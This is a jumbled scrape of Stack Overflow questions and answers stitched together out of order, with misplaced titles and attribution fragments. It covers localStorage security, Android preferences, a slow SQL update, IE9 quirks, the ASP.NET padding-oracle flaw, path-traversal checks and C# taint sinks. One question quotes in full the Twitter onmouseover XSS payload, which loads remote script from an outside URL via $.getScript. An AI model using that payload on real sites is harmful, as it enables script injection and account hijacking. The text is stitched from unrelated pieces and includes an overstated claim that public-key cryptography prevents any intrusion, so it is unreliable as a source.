Bad idea.

1. Someone with access to the machine will always be able to read the localStorage, there is nothing much you can do to prevent it. Just type &#39;localStorage&#39; in firebug console, and you get all the key/value pairs nicely listed.
2. If you have an XSS vulnerability in your application, anything stored in `localStorage` is available to an attacker.
3. You can try and encrypting it, but there is a catch. Encrypting it on the client is possible, but would mean the user has to provide a password **and** you have to depend on not-so-well-tested javascript implementations of cryptography. 
4. Encrypting on the server side is of course possible, but then the client code cannot read or update it, and so you have reduced localStorage to a glorified cookie.

If it needs to be secure, its best to not send it to the client. What is not in your control can never be secure.

Public Key Cryptography can be applied to prevent any kind of intrusion. Also, data integrity checks (such as CRC or hashes) may be used to make sure data is validated by the server.

Using a simple `EditTextPreference` in my preferences activity:

    &lt;EditTextPreference
        android:key=&quot;SomeKey&quot;
        android:title=&quot;@string/some_title&quot;
        android:summary=&quot;...&quot;
        android:numeric=&quot;integer&quot;
        android:maxLength=&quot;2&quot;
    /&gt;

Is there a way that this configuration value would be saved as integer? Seems now it just allows to enter numbers, but the value is still saved as string:

Calling:

    SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(this);
    int value = preferences.getInt(&quot;SomeKey&quot;, -1);

throws me `java.lang.ClassCastException: java.lang.String`, and:

    SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(this);
    String value = preferences.getString(&quot;SomeKey&quot;, &quot;-1&quot;);

retrieves the value successfully.

How to make `PreferenceActivity` to save value as integer by default?

PreferenceActivity: save value as integer

I need to initialize a new field with the value -1 in a 120 Million record table.

    Update table
           set int_field = -1;

I let it run for 5 hours before canceling it.

I tried running it with transaction level set to read uncommitted with the same results.

    Recovery Model = Simple.
    MS SQL Server 2005

Any advice on getting this done faster?



Fastest way to update 120 Million records

Would be a good or bad idea to use localStorage for sensitive data (assuming the current HTML5 implementations)?

What methods can I use to secure the data so that it cannot be read by a person that has access at the client computer?

HTML5 localStorage security

<p>Would be a good or bad idea to use localStorage for sensitive data (assuming the current HTML5 implementations)?</p>
<p>What methods can I use to secure the data so that it cannot be read by a person that has access at the client computer?</p>


For pages already specified (either by HTTP header, or by meta tag), to have a Content-Type with a UTF-8 charset... is there a benefit of adding `accept-charset=&quot;UTF-8&quot;` to HTML forms?

(I understand the `accept-charset` attribute is broken in IE for ISO-8859-1, but I haven&#39;t heard of a problem with IE and UTF-8. I&#39;m just asking if there&#39;s a benefit to adding it with UTF-8, to help prevent invalid byte sequences from being entered.)

Is there any benefit to adding accept-charset=&quot;UTF-8&quot; to HTML forms, if the page is already in UTF-8?

Does anybody know if Internet Explorer supports the `history.pushState()` and `history.replaceState()` methods for [manipulating browser history][1]? Considering these are just being implemented in Firefox 4, I&#39;m not holding my breath, but does anybody know if they&#39;re coming in IE9?


  [1]: https://developer.mozilla.org/en/DOM/Manipulating_the_browser_history

Does Internet Explorer support pushState and replaceState?

I have a problem and I can&#39;t figure out what exactly is causing this behavior.  I cannot access my input fields and `textarea`s on my HTML form.

Unfortunately, the JS, HTML and CSS are very large, so I can&#39;t really post it all here. 

Can anybody tell me what to look for when debugging this strange behavior?

**UPDATE**

If I move the cursor over the `input` field I can see the text cursor, but when I click it the field does not get the focus.  I can access the field via pressing the &lt;kbd&gt;Tab&lt;/kbd&gt; key and if I right click on it and then click on the field I also get the focus for it.

...and nope, they don&#39;t have the `disabled` or `readonly` attributes ;-)

HTML input fields does not get focus when clicked

I have just installed IE9 beta and on a specific site I created (HTML5) IE9 jumps to compatibility mode unless I manually tell it not to. I have tried removing several parts of the website but no change. Including removing all CSS includes. On some other website of me it goes just fine.

Also, don&#39;t set it manually because then IE9 remembers the user setting and you can&#39;t turn it back to automatic (or at least I haven&#39;t found how, not even via private browsing and emptying cache)

Anyway. The site where it jumps to compatibility mode: http://alliancesatwar.com/guide/  
One where it renders correct: http://geuze.name/basement/ (I can&#39;t post more than 1 hyperlink)

Both use the same `doctype` and all. Those sites have a lot in common(apart from appearance) using the same basic template(encoding, meta tags, doctype and the same javascript)

It would be great if someone has an answer for me! An HTML5 website that renders in IE7-mode is pretty... lame.


Why does IE9 switch to compatibility mode on my website?

Why can&#39;t I pass in html attributes to `EditorFor()`? eg; 

    &lt;%= Html.EditorFor(model =&gt; model.Control.PeriodType, 
        new { disabled = &quot;disabled&quot;, readonly = &quot;readonly&quot; }) %&gt;

I don&#39;t want to use metadata

**Update**: The solution was to call this from the view :

     &lt;%=Html.EditorFor( model =&gt; model.Control.PeriodEndDate, new {Modifiable=model.Control.PeriodEndDateModifiable})%&gt;

and use `ViewData[&quot;Modifiable&quot;]` in my custom EditorTemplates/String.ascx where I have some view logic that determines whether to add readonly and/or disabled attributes to the input
The anonymous object passed into `EditorFor()` is a parameter called `additionalViewData` and its properties are passed to the editor template in the `ViewData` collection.

Html attributes for EditorFor() in ASP.NET MVC

I&#39;ve just read on the net about a newly discovered security vulnerability in ASP.NET. [You can read the details here.][1]

&gt; The problem lies in the way that
&gt; ASP.NET implements the AES encryption
&gt; algorithm to protect the integrity of
&gt; the cookies these applications
&gt; generate to store information during
&gt; user sessions.

This is a bit vague, but here is a more frightening part:
 
&gt; The first stage of the attack takes a
&gt; few thousand requests, but once it
&gt; succeeds and the attacker gets the
&gt; secret keys, it&#39;s totally stealthy.The
&gt; cryptographic knowledge required is
&gt; very basic.

All in all, I&#39;m not familiar enough with the security/cryptograpy subject to know if this is really that serious.

So, should all ASP.NET developers fear this technique that *can own any ASP.NET website in seconds* or what?

How does this issue affect the average ASP.NET developer? Does it affect us at all?
In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?

Thanks for your answers!


----------


EDIT: Let me summarize the responses I got
----------------------------------------

So, this is basically a &quot;padding oracle&quot; type of attack. [@Sri][2] provided a great explanation about what does this type of attack mean. [Here is a shocking video about the issue!][3]

About the seriousness of this vulnerability: Yes, it is indeed serious. *It lets the attacker to get to know the machine key of an application.* Thus, he can do some **very** unwanted things.

- In posession of the app&#39;s machine key, the attacker can decrypt authentication cookies.
- Even worse than that, he can **generate authentication cookies** with the name of any user. Thus, he can appear as anyone on the site. The application is unable to differentiate between you or the hacker who generated an authentication cookie with your name for himself.
- It also lets him to decrypt (and also generate) **session cookies**, although this is not as dangerous as the previous one.
- Not so serious: He can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidental data, you shouldn&#39;t do this anyways!)
- **Quite unexpected**: With the knowledge of the machine key, the attacker **can download** any arbitrary file from your web application, even those that normally can&#39;t be downloaded! (Including **Web.Config**, etc.)

Here is a bunch of good practices I got that **don&#39;t** solve the issue but help improve the general security of a web application.

- [You can encrypt sensitive data with Protected Configuration][4]
- [Use HTTP Only cookies][5]
- Prevent DoS attacks

Now, let&#39;s focus on this issue.

- [Scott Guthrie published an entry about it on his blog][6]
- [ScottGu&#39;s FAQ blog post about the vulnerability][7]
- [ScottGu&#39;s update on the vulnerability][8]
- [Microsoft has a security advisory about it][9]
- [Understanding the vulnerability][10]
- [Additional information about the vulnerability][11]

The solution

- Enable customErrors and make a single error page to which **all errors** are redirected. Yes, **even 404s**. (ScottGu said that differentiating between 404s and 500s are essential for this attack.) Also, into your `Application_Error` or `Error.aspx` put some code that makes a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server.
- Some people recommended switching back to 3DES. In theory, if you don&#39;t use AES, you don&#39;t encounter the security weakness in the AES implementation. As it turns out, this is **not recommended at all**.

Some other thoughts

- Seems that [not][12] [everyone][13] thinks the workaround is good enough.

Thanks to everyone who answered my question. I learned a lot about not only this issue, but web security in general. I marked @Mikael&#39;s answer as accepted, but the other answers are also very useful.


  [1]: http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
  [2]: https://stackoverflow.com/questions/3720720/how-serious-is-this-new-asp-net-security-vulnerability-and-how-can-i-workaround-i/3721473#3721473
  [3]: http://www.youtube.com/watch?v=yghiC_U2RaM
  [4]: http://msdn.microsoft.com/en-us/library/zhhddkxy%28VS.80%29.aspx
  [5]: http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html
  [6]: http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
  [7]: http://weblogs.asp.net/scottgu/archive/2010/09/20/frequently-asked-questions-about-the-asp-net-security-vulnerability.aspx
  [8]: http://weblogs.asp.net/scottgu/archive/2010/09/24/update-on-asp-net-vulnerability.aspx
  [9]: http://www.microsoft.com/technet/security/advisory/2416728.mspx
  [10]: http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
  [11]: http://blogs.technet.com/b/srd/archive/2010/09/20/additional-information-about-the-asp-net-vulnerability.aspx
  [12]: http://www.onpreinit.com/2010/09/aspnet-vulnerability-workaround-flawed.html
  [13]: http://blogs.microsoft.co.il/blogs/linqed/archive/2010/09/19/padding-oracle-asp-net-vulnerability-explanation.aspx

How serious is this new ASP.NET security vulnerability and how can I workaround it?

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:  

&lt;pre&gt;http://t.co/@&quot;style=&quot;font-size:999999999999px;&quot;onmouseover=&quot;$.getScript(&#39;http:\u002f\u002fis.gd\u002ffl9A7&#39;)&quot;/&lt;/pre&gt;

Is this technically an XSS attack or something else?

Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Today&#39;s XSS onmouseover exploit on twitter.com

I like to write a template system in Python, which allows to include files.

e.g.
&lt;pre&gt;
    This is a template
    You can safely include files with safe_include`othertemplate.rst`
&lt;/pre&gt;

As you know, including files might be dangerous. For example, if I use the template system in a web application which allows users to create their own templates, they might do something like

&lt;pre&gt;
I want your passwords: safe_include`/etc/password`
&lt;/pre&gt;

So therefore, I have to restrict the inclusion of files to files which are for example in a certain subdirectory (e.g. &lt;code&gt;/home/user/templates&lt;/code&gt;)

The question is now: How can I check, whether &lt;code&gt;/home/user/templates/includes/inc1.rst&lt;/code&gt; is in a subdirectory of &lt;code&gt;/home/user/templates&lt;/code&gt;?

Would the following code work and be secure?

    import os.path

    def in_directory(file, directory, allow_symlink = False):
        #make both absolute    
        directory = os.path.abspath(directory)
        file = os.path.abspath(file)

        #check whether file is a symbolic link, if yes, return false if they are not allowed
        if not allow_symlink and os.path.islink(file):
            return False

        #return true, if the common prefix of both is equal to directory
        #e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
        return os.path.commonprefix([file, directory]) == directory

As long, as `allow_symlink` is False, it should be secure, I think. Allowing symlinks of course would make it insecure if the user is able to create such links.


**UPDATE - Solution**
The code above does not work, if intermediate directories are symbolic links.
To prevent this, you have to use `realpath` instead of `abspath`.

**UPDATE:** adding a trailing / to directory to solve the problem with commonprefix() Reorx pointed out.

This also makes `allow_symlink` unnecessary as symlinks are expanded to their real destination   

    import os.path

    def in_directory(file, directory):
        #make both absolute    
        directory = os.path.join(os.path.realpath(directory), &#39;&#39;)
        file = os.path.realpath(file)

        #return true, if the common prefix of both is equal to directory
        #e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
        return os.path.commonprefix([file, directory]) == directory

How to check whether a directory is a sub directory of another directory

This question is similar to [Exploitable PHP Functions][2].

Tainted data comes from the user,  or more specifically an attacker.  When a tainted variable reaches a sink function,  then you have a vulnerability.  For instance a function that executes a sql query is a sink,  and GET/POST variables are sources of taint. 

What are all of the sink functions in C#?  I am looking for functions that introduce a vulnerability or [software weakness][1].  I am particularly interested in Remote Code Execution vulnerabilities.  Are there whole classes/libraries that contain nasty functionally that a hacker would like to influence?   How do people accidentally make dangerous C# code? 


  [1]: http://cwe.mitre.org/data/slices/2000.html
  [2]: https://stackoverflow.com/questions/3115559/exploitable-php-functions/3697776#3697776

Exploitable C# Functions

I have read [this thread][1] but I&#39;m wondering how secure such a solution would be? I know that github offers ssh/ssl support and am familiar but could someone give me a breakdown of what sort of internal security they would use to make sure my committed conf/credential files don&#39;t get hacked?

**EDIT**: I&#39;ve read http://help.github.com/security/ but I would like an answer from someone who has worked with multiple repository hosts and has real-world experience with this.


  [1]: https://stackoverflow.com/questions/109440/best-git-repository-hosting-for-commercial-project

Content Type	Original Author	Original Content on Stackoverflow
Question	Aleris	View Question on Stackoverflow
Solution 1 - Html	Sripathi Krishnan	View Answer on Stackoverflow
Solution 2 - Html	dashersw	View Answer on Stackoverflow

HTML5 localStorage security

Html Problem Overview

Html Solutions

Solution 1 - Html

Solution 2 - Html

Fastest way to update 120 Million records

PreferenceActivity: save value as integer

Attributions